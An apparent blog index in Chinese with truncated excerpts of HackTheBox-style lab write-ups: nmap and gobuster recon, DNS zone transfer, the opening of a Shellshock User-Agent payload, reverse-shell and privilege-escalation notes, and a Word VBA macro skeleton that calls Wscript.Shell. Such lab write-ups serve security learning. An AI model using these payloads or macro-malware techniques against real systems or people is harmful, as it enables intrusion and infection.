Irked irc服务扫描
简介IrkedDifficulty Easy 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.117 Linux 1. 信息收集收集受害者服务详情nmap -T5 -n -vvv -oA Irked -noscript 10.10.10.117806697/tcp op...
node2 ltrace使用 利用修改HOME环境变量bypass指定目录
权限提升到root现在我们有了tom的反弹shelltom是admin组的成员 可以运行 前提 看一下当时从网页上下载的文件中的app.js这里有一组命令使用方法且在这里看到想到这就是命令中的backup_key所以尝...
node1 mongodb反弹shell
简介nodeDifficulty Medium 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.58 Linux 1. 信息收集收集受害者服务详情nmap -sC -sV -p- 10.10.10.58 --min-rate 10000 -oA tartar22和30...
Sunday 79端口finger服务用户枚举
简介SundayDifficulty Easy 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.76 Solaris 1. 信息收集收集受害者服务详情nmap -sC -sV -p- 10.10.10.76 --min-rate 10000 -oA Sunday发现一...
Posion ssh端口转发 vnc连接
简介PosionDifficulty Medium 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.84 Linux 1. 信息收集收集受害者服务详情nmap -sV -A 10.10.10.84有22、80端口 访问80端口在listfiles.p...
SolidState 各种邮件服务枚举
简介MetaDifficulty Medium 实验环境攻击者 Kali 10.10.16.15受害者 IP 10.10.10.51 Linux 1. 信息收集收集受害者服务详情nmap -sV -A 10.10.10.51开启22 25 80 110 4555端口nmap -p 22,25,...
DNS挖掘
1. 找到名字服务器nslookup > server 10.10.10.13 > 10.10.10.13找到了名字服务器和域名 2. 根据域名找到子域名dig axfr @10.10.10.13 cronos.htb这时候就可以将它们写入/etc/hosts
Shocker cgi-bin目录shellshock
前提有cgi-bin 403错误Bash要小于4.3 漏洞找到.sh的文件gobuster dir -u http://10.10.10.185/cgi-bin/ -w /usr/share/dirb/wordlists/common.txt -x .sh找到是user.shUser-Agent: () { :;};...
Magic Magic Bytes Head文件上传绕过 mysqldump
简介MetaDifficulty Medium 实验环境攻击者 Kali 10.10.16.9受害者 IP 10.10.10.185 Linux 1. 信息收集收集受害者服务详情nmap -sV -A 10.10.10.14522 80 开启 gobuster爆破gobuster dir -...
客户端攻击1 word宏攻击
1. 创建一个doc文件 不要docx的 2. 开始创建宏 3. 宏病毒框架Sub AutoOpen() MyMacro End Sub Sub Document_Open() MyMacro End Sub Sub MyMacro() #这里写命令 CreateObject('Wscript.Shell'...